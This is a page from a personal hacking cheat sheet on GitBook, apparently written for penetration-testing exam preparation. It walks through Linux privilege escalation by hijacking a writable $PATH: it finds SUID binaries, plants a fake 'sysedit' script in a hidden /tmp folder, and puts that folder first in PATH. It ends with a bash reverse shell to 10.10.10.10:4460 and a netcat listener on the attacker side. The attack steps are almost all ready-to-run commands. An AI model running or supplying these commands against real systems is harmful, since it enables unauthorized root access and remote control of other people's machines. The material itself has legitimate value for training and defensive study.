Cheat Sheet Hacking
  • 🌐Generic Ideas
    • File Transfer
    • Reverse Shell
    • Cracking Tricks
    • Tunneling and Port Forwarding
    • Reversing
    • OSINT
    • Phishing
  • 🐕‍🦺Port enumeration
    • Reconnaissance
    • 53 - DNS
    • 80,443 - Web
      • Identify php.ini file used
      • Exploitation
        • File Upload
        • XXS
    • 445 - SMB
    • 389, 636, 3268 - LDAP(S)
  • LINUX THINGS
    • Enumeration
    • Privilege Escalation
      • Writable $PATH
  • WINDOWS THINGS
    • Enumeration
    • Useful Commands
    • Active Directory Methodology
      • Commands to create AD environment
      • Attacks
        • Kerberos
          • User enumeration
          • ASREP-Roast
          • Kerberoasting
          • ASREP-Roast VS Kerberoasting
          • Golden Ticket
          • Resource Based Constrained Delegation
        • Secrets dump
        • Pass The Hash
        • Dump NTDS
        • Tickets
          • TGT
        • NTML Password Spray
        • LDAP Authentication
          • LDAP Pass-back
          • Rogue LDAP Server
        • SMB Relay (LLNMR, NTB-NS & WPAD)
        • NTLM Relay
        • Tools to exploit AD things
        • SCF Files
      • Kerberos
      • SAM & LSA secrets
      • Enumeration
        • BloodHound
        • PowerView
          • CheatSheet of Commands
        • Set DNS & DOMAIN
      • Resources
      • RunAs
      • Post Explotation
        • Persistence
        • Mimikatz
      • Common used tools
  • 🕳️Pivoting
    • Port Forwarding
    • Socks Forwarding
    • Routing
    • Web Fuzzing
    • Transfer files
    • Metasploit
      • Single Pivot
      • Double Pivot
    • Burp Suite
  • 🎛️Hardware
    • Physical attacks
  • 🌕Buffer Overflow
    • Introduction
    • Stack-Based
      • Introduction
        • Spiking
        • Fuzzing
        • Find Offset
        • Overwrite EIP
        • Find module
        • Find Badchars
        • Shellcode
  • 🐳Docker
    • Commands
    • Practical examples
  • 💡Useful things
    • Burp Suite
      • Proxy Activation
    • Linux Commands
    • Recreate multipart/form-data request
      • Python
      • HTML & netcat
    • TTY
    • Templates for reports (exams)
    • Tmux
    • Other cheat sheets
Powered by GitBook
On this page
  • Path Hijacking
  • Identify the SUID file
  • Create a file with malicious content
  • Update the $PATH variable
  • If we want a Reverse Shell
  1. LINUX THINGS
  2. Privilege Escalation

Writable $PATH

Path Hijacking

Identify the SUID file

find \ -perm -4000 2>/dev/null

For example, we found a file called /usr/bin/sysedit, and this binary is called from a random task or script that we control or we can execute.

Create a file with malicious content

We need to create a file with the same name as the SUID previously found:

mkdir /tmp/.my-things
cd !$
echo "#/bin/bash" > sysedit
echo "id > /tmp/.my-things/id.txt" >> sysedit

Update the $PATH variable

echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
export PATH=/tmp/.my-things:$PATH
echo $PATH
# /tmp/.my-things:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin

With that, we are going to position our malicious folder (with the malicious file inside) as the first folder that the system will reach if the (in this case) sysedit file is invoked.

We need to execute the task or service that is calling that file again. And instead of the normal execution, we are going to see:

ls /tmp/.my-things
# id.txt

If we want a Reverse Shell

In the attack machine, we are going to listen to any port:

nc -lnvp 4460

Now create the file with the connection towards the attacker listener:

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4460 0>&1'" > sysedit
PreviousPrivilege EscalationNextEnumeration

Last updated 5 months ago